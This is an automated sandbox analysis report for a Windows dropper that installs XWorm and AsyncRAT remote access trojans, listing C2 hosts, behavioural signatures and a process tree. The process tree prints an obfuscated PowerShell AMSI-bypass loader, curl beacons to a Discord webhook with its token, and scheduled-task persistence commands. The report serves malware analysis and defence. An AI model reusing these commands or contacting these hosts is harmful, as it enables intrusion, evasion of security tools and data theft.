Analysis

  • max time kernel
    150s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    22-06-2024 05:30

General

  • Target

    Dropper.exe

  • Size

    1.4MB

  • MD5

    0db5ce13fa3f2058572801bbffcaa3f3

  • SHA1

    49580b807ee8e9a7bd4b7a045ceec6c93ae093dd

  • SHA256

    9639537e3aa2c1d7866a72856656b9afa4e6c761d7c6ae43a78e1075b38f3b8b

  • SHA512

    a46cbf5da20f09e514590e7de8f8e932427b15060724cd716c38e9e6b232003bcdf01db6dcf06300459c0386a7f3bbc2c6c354b578792e8b2ec13de4d1414f4b

  • SSDEEP

    12288:B0w1hc0Q53LOAGkjwtBx5n4AYakafNh/ymPj/YDLm7GylDULvEd8oK/mngAmgIv:BrmwDRPjwuB

Malware Config

Extracted

Family

xworm

C2

politics-fiber.gl.at.ply.gg:47430

Attributes
  • Install_directory

    %AppData%

  • install_file

    $77-scchost.exe

Extracted

Family

asyncrat

Botnet

Default

C2

environmental-blank.gl.at.ply.gg:25944

Attributes
  • delay

    1

  • install

    true

  • install_file

    $77-aachost.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is a remote access trojan written in C#, designed to remotely monitor and control other computers.

  • Detect Xworm Payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Async RAT payload 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Drops file in System32 directory 17 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 26 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 15 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:336
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{f614ee01-1833-4b08-a8d2-1e1ad2f440cb}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4740
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:668
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:956
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:532
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:996
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                1⤵
                • Drops file in System32 directory
                PID:1060
                • C:\Windows\system32\taskhostw.exe
                  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                  2⤵
                    PID:2824
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:yUJYGBYTuIbl{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$pPIVggVPTXqYse,[Parameter(Position=1)][Type]$kRrPbdVbzW)$VwSumcJpZJk=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+''+'e'+'d'+[Char](68)+''+[Char](101)+'l'+'e'+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+'y'+'M'+''+'o'+''+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+'e'+''+'l'+''+'e'+''+'g'+''+'a'+''+[Char](116)+''+[Char](101)+''+'T'+'yp'+[Char](101)+'',''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+'s'+''+','+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+'S'+'e'+''+'a'+''+'l'+''+'e'+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+'u'+''+[Char](116)+''+[Char](111)+'Cl'+'a'+''+'s'+'s',[MulticastDelegate]);$VwSumcJpZJk.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+'i'+[Char](97)+''+[Char](108)+''+[Char](78)+'am'+'e'+''+[Char](44)+'Hi'+[Char](100)+''+'e'+'B'+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+'l'+'i'+'c',[Reflection.CallingConventions]::Standard,$pPIVggVPTXqYse).SetImplementationFlags('R'+'u'+''+'n'+'ti'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+[Char](97)+''+'g'+'ed');$VwSumcJpZJk.DefineMethod('I'+'n'+''+'v'+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'ig'+','+''+[Char](78)+''+'e'+''+'w'+''+[Char](83)+''
+'l'+''+[Char](111)+''+'t'+','+'V'+''+[Char](105)+'r'+'t'+''+[Char](117)+'a'+'l'+'',$kRrPbdVbzW,$pPIVggVPTXqYse).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $VwSumcJpZJk.CreateType();}$DyWJSxRKyGrzg=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.'+'d'+'ll')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+'3'+''+[Char](50)+''+[Char](46)+''+'U'+'n'+[Char](115)+'a'+'f'+'e'+[Char](78)+''+[Char](97)+''+[Char](116)+'i'+'v'+''+[Char](101)+''+'M'+''+[Char](101)+'th'+[Char](111)+'ds');$FpHTJhMNmQJGZM=$DyWJSxRKyGrzg.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+'r'+[Char](111)+''+[Char](99)+'Ad'+'d'+'r'+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+'t'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$EqOBQYHdnGfBjVxWHCG=yUJYGBYTuIbl @([String])([IntPtr]);$EWyYavpQmdhLSDkNbSyZIW=yUJYGBYTuIbl 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$pJwOZzceRHe=$DyWJSxRKyGrzg.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+'Mod'+[Char](117)+''+'l'+''+'e'+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+'n'+[Char](101)+''+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$vmcsjinuyKrLqb=$FpHTJhMNmQJGZM.Invoke($Null,@([Object]$pJwOZzceRHe,[Object](''+'L'+'oa'+[Char](100)+''+'L'+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+''+[Char](121)+''+'A'+'')));$ePtXapweUYqgUHpiq=$FpHTJhMNmQJGZM.Invoke($Null,@([Object]$pJwOZzceRHe,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+'a'+'l'+[Char](80)+''+'r'+'o'+'t'+''+'e'+''+[Char](99)+''+[Char](116)+'')));$JkQSrlI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vmcsjinuyKrLqb,$EqOBQYHdnGfBjVxWHCG).Invoke('a'+[Char](109)+''+'s'+''+[Char](105)+''+'.'+'d'+[Char](108)+'l');$fOySBwUwbbICEGpIg=$FpHTJhMNmQJGZM.Invoke($Null,@([Object]$JkQSrlI,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+'i'+''+'S'+'c'+[Char](97)+'n'+'B'+''+[Char](117)+''+[Char](102)+'f'+'e'+'r')));$BAUwsnQOoG=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ePtXapweUYqgUHpiq,$EWyYavpQmdhLSDkNbSyZIW).Invoke($fOySBwUwbbICEGpIg,[uint32]8,4,[ref]$BAUwsnQOoG);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$fOySBwUwbbICEGpIg,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ePtXapweUYqgUHpiq,$EWyYavpQmdhLSDkNbSyZIW).Invoke($fOySBwUwbbICEGpIg,[uint32]8,0x20,[ref]$BAUwsnQOoG);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+'$'+'7'+[Char](55)+''+[Char](115)+'t'+[Char](97)+''+'g'+'er')).EntryPoint.Invoke($Null,$Null)"
                    2⤵
                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                    • Drops file in System32 directory
                    • Suspicious use of SetThreadContext
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:3236
                  • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                    C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                    2⤵
                    • Executes dropped EXE
                    PID:1204
                  • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                    C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                    2⤵
                    • Executes dropped EXE
                    PID:3788
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                  1⤵
                    PID:1112
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                    1⤵
                      PID:1132
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                      1⤵
                      • Drops file in System32 directory
                      PID:1228
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1252
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                        1⤵
                          PID:1372
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                          1⤵
                            PID:1416
                            • C:\Windows\system32\sihost.exe
                              sihost.exe
                              2⤵
                                PID:2628
                            • C:\Windows\System32\svchost.exe
                              C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                              1⤵
                                PID:1436
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                1⤵
                                  PID:1444
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                  1⤵
                                    PID:1452
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                    1⤵
                                      PID:1564
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1628
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                        1⤵
                                          PID:1672
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                          1⤵
                                            PID:1760
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1796
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              1⤵
                                                PID:1880
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                1⤵
                                                  PID:1892
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1900
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                    1⤵
                                                      PID:1952
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:1972
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:1592
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                            PID:2072
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                            1⤵
                                                              PID:2204
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                              1⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2272
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                              1⤵
                                                                PID:2508
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                1⤵
                                                                  PID:2516
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                  1⤵
                                                                    PID:2672
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                    1⤵
                                                                    • Drops file in System32 directory
                                                                    PID:2776
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                    1⤵
                                                                      PID:2804
                                                                    • C:\Windows\sysmon.exe
                                                                      C:\Windows\sysmon.exe
                                                                      1⤵
                                                                        PID:2836
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2860
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                          1⤵
                                                                            PID:2880
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                            1⤵
                                                                              PID:2944
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:3092
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                1⤵
                                                                                  PID:3396
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                  • Modifies Internet Explorer settings
                                                                                  • Modifies registry class
                                                                                  • Suspicious behavior: AddClipboardFormatListener
                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:3456
                                                                                  • C:\Users\Admin\AppData\Local\Temp\Dropper.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\Dropper.exe"
                                                                                    2⤵
                                                                                    • Checks computer location settings
                                                                                    • Modifies registry class
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:3556
                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      3⤵
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      PID:3484
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
                                                                                      3⤵
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:3348
                                                                                      • C:\Windows\SysWOW64\curl.exe
                                                                                        curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
                                                                                        4⤵
                                                                                          PID:4884
                                                                                      • C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
                                                                                        3⤵
                                                                                        • Checks computer location settings
                                                                                        • Executes dropped EXE
                                                                                        • Adds Run key to start application
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:3656
                                                                                        • C:\Windows\System32\schtasks.exe
                                                                                          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Users\Admin\AppData\Roaming\$77-scchost.exe"
                                                                                          4⤵
                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                          PID:2612
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            5⤵
                                                                                              PID:3008
                                                                                        • C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
                                                                                          3⤵
                                                                                          • Checks computer location settings
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4008
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"' & exit
              • Suspicious use of WriteProcessMemory
              PID:464
                • C:\Windows\system32\schtasks.exe
                  schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'
                  • Scheduled Task/Job: Scheduled Task
                  PID:2196
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3F0C.tmp.bat""
              • Suspicious use of WriteProcessMemory
              PID:2336
                • C:\Windows\System32\Conhost.exe
                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  PID:440
                • C:\Windows\system32\timeout.exe
                  timeout 3
                  • Delays execution with timeout.exe
                  PID:4424
        • C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
          "C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2764
        • C:\Users\Admin\AppData\Local\Temp\$77-install.exe
          "C:\Users\Admin\AppData\Local\Temp\$77-install.exe"
          • Executes dropped EXE
          PID:3764
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""System.IO.DirectoryNotFoundException: Could not find a part of the path 'C:\Users\Admin\AppData\Local\Temp\%userprofile%\test.exe'. at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath) at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost) at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost) at System.IO.StreamWriter.CreateFile(String path, Boolean append, Boolean checkHost) at System.IO.StreamWriter..ctor(String path, Boolean append, Encoding encoding, Int32 bufferSize, Boolean checkHost) at System.IO.StreamWriter..ctor(String path, Boolean append, Encoding encoding) at Dropper.Dropping.Main()"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
          PID:1048
            • C:\Windows\System32\Conhost.exe
              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              PID:1040
            • C:\Windows\SysWOW64\curl.exe
              curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""System.IO.DirectoryNotFoundException: Could not find a part of the path 'C:\Users\Admin\AppData\Local\Temp\C:\Users\Admin\test.exe'.
              PID:608
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
  PID:3636
• C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  PID:3824
• C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  • Suspicious use of UnmapMainImage
  PID:3988
• C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  • Checks SCSI registry key(s)
  • Modifies registry class
  PID:3672
• C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
  PID:1804
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
  PID:3940
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
  • Modifies data under HKEY_USERS
  PID:880
• C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
  • Drops file in System32 directory
  • Modifies data under HKEY_USERS
  PID:4540
• C:\Windows\system32\SppExtComObj.exe
  C:\Windows\system32\SppExtComObj.exe -Embedding
  PID:5024
• C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
  PID:1080
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
  • Modifies data under HKEY_USERS
  PID:4376
• C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  PID:1772
• C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  PID:2404
• C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  PID:2768
• C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  • Modifies registry class
  PID:1936
• C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
  PID:5044
• C:\Windows\System32\WaaSMedicAgent.exe
  C:\Windows\System32\WaaSMedicAgent.exe 3cf9c4e2e78a9c71cc56ae1e58051513 +8aqzdKYHEqkWAHnRaeb7g.0.1.0.0.0
  • Sets service image path in registry
  PID:1868
    • C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      PID:2744
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
  • Drops file in Windows directory
  PID:1032
• C:\Windows\system32\wbem\wmiprvse.exe
  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
  • Checks BIOS information in registry
  • Checks SCSI registry key(s)
  • Checks processor information in registry
  • Enumerates system info in registry
